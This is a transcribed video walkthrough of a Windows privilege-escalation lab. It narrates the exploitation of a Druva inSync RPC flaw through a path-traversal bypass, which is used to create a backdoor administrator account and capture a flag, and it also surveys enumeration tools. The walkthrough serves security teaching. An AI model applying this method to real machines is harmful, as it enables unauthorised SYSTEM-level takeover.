as that's done, we can look at the list of it, but let's continue to read on until this finishes. Case study, Druva nsync 6.6.3. The target server is running Druva nsync 6.6.3, which is vulnerable to privilege escalation as reported by Matteo Malvica. The vulnerability results from a bad patch applied over another vulnerability reported initially for version 6.5.0 by Chris Line. The software is vulnerable because it runs an RPC, which is remote procedure call server on port 6064 with system privileges accessible from localhost only. If you aren't familiar with RPC, it is simply a mechanism that allows a given process to expose functions called procedures and RPC lingo over the network so that other machines can call them remotely. All right, so this is finally started up here. So if we go into CMD and run this, we should see a list of installed programs. All right, so it finally loaded up, and I'm going to copy and paste this over. All right, now let's continue on with reading here. In case of Druva and Sync, one of the procedures, specifically procedure number 5 on port 6064, allowed anyone to request the execution of any command. Since the RPC server runs as system, any command gets executed with system privileges. The original vulnerability reported on version 6.5.0 and prior allowed any command to be run without restrictions. The original idea behind providing such functionality was to remotely execute some specific binaries provided with nsync rather than any command. Still, no checks was made to make sure that. A patch was issued where they decided to check that the executed command started with the string C program data druva nsync 4, where the allowed binaries were supposed to be. But then this proved insufficient since you could simply take a path reversal attack to bypass this kind of control. Suppose that you want to execute the following here: C Windows System32 cmd.exe, which is not in the allowed path. You could simply ask the server to run C program data druva nsync and then Windows System32 System32 cmd.exe, and that would bypass the check successfully. To put together a working exploit, we need to understand how to talk to port 6064. Luckily for us, the protocol is in use is straightforward, and the packets to be sent depicted in the following diagram. And that's what it looks like here. The first packet is simply a hello packet that contains a fixed string. The second packet indicates that we want to execute procedure number 5. as this is vulnerable procedure that will execute any command for us. The last two packets are used to send the length of the pack or the command and the command string to be executed respectively. Initially published by Matteo Malvica here, the following exploit can be used in your target machine to elevate privileges and retrieve the task flag. For your convenience, here is the original exploit code. So I'm going to get ready to copy and paste this. So let's go and copy this first. Then let's continue on. You can pop a PowerShell console and paste the exploit code directly to execute it. The exploit is also available on the target machine located here. See tools, driven sync, exploit.txt. Note that the exploit's default payload specified in the $CMD variable will create a username pwned in the system, but we want to assign him administrative privileges. So we'll probably want to change the payload for something more useful. For this room, we will change the payload to run the following command. All right, so we'll have to make some modifications to this, obviously, as it said above here. So that's what it looks like. And to do this, let's go ahead and follow along. This will create user pwn with a password of simple pass123 and add to the administrators group. If the exploit was successful, you should be able to run the following command to verify the user pwn exists and is part of the administrators group. As a last step, you can run command prompt as administrator. So first off, let's go ahead and do this here. So I'm going to type in, let's do PowerShell. Let's do this one, IC, and paste all the stuff in there. All right, this machine is a bit slow right now. Finally. Okay, so let's go ahead and let's view, let's do, okay, pane top's already there, so where is it? It's not showing up anywhere. Let's do this. And, all right, whatever. Let's do this, paste, and we're going to replace the payload with this information. So go ahead and move this over, clear all this out. Okay, looks good. Not sure what was running there, but let's go ahead and start this. Whoa. Okay, that's weird. All right, and it should be successful, but let's go ahead and check our information here. So net user pwned. Okay, there it is, administrators group. All right, looks like it was successful. Now we can open up command prompt as administrator using those credentials. All right, so let's go ahead and change this to pwned. All right, and then what was the password again? Simple pass. Okay, so simple pass 123. All right. When prompted for credentials, use the pwn account. From the new command prompt, you can retrieve the flag on your own, located here. So we can use type and then C users and administrator desktop. Bam. All right, there we go. So we got the flag for that. Now we're going to continue on to task number 8. And it says tools of the trade. And let's see what they have for us here. Several scripts exist to conduct system enumeration in ways similar to the one seen in the previous task. These tools can shorten the enumeration process time and uncover different potential privilege escalation vectors. However, please remember that automated tools can sometimes miss privilege escalation. Below are a few tools commonly used to identify privilege escalation vectors. Feel free to run them against any of the machines in this room and see if the results match the discussed attack vectors. All right, they're going over some of them here. I'm not going to run them on this machine, so feel free to try these out on this machine if you have access to this room, or just try this out on some kind of exploited machine you've downloaded somewhere. All right, it's going to talk about WinPs here, same as LinPs and the other one. It finds um, possible privilege escalation vectors, right? WinPs is a script developed to enumerate the target system to uncover privilege escalation paths. You can find more information about WinPs and download either the precompiled executable or a .bat script. WinPs will run commands similar to the ones listed in the previous task and print their output. The output from WinPs can be lengthy and sometimes difficult to read. This is why it would be good practice to always redirect the output to a file. As shown below, see they're running WinPs.exe and redirecting the output to outputfile.txt. You can download WinPs from here, and privesc check says is a PowerShell script that searches common privilege escalation on the target system. It provides an alternative to WinPs without requiring the execution of a binary file. All right, now if you're going to run this, it says you need to set execution policy, right? Change up some stuff here. WS WES-NG Windows exploit suggester next generation. Some exploits suggesting scripts, e.g. WinPs, will require you to upload them to the target system and run them there. This may cause antivirus software to detect and delete them to avoid making unnecessary noise that can attract attention. You can um, use WES-NG, which will run on your attacking machine. Example would be Kali, TryHackMe attack box. So it says the Python script can be downloaded here, and you can use the following information here to run it. All right, if you want to try that out. And of course, Metasploit has its own exploit suggester, so you can try that out to list out possible vulnerabilities on the affected target system. All right, hit complete. So we're done with task number 8, and then task number 9, conclusion. In this room, we have introduced several privilege escalation techniques available in Windows systems. These techniques should provide you with a solid background on the most common paths attackers can take to elevate privileges on a system. Should you be interested in learning about additional techniques, the following resources are available. So check out all this stuff here if you're interested in continuing on this particular area, right? But we're going to close out the video here, and I'm glad you guys followed along. If you did not, hopefully you took good notes here. And thank you all for taking the time to watch. If you enjoyed the content, be sure to like, comment, and subscribe.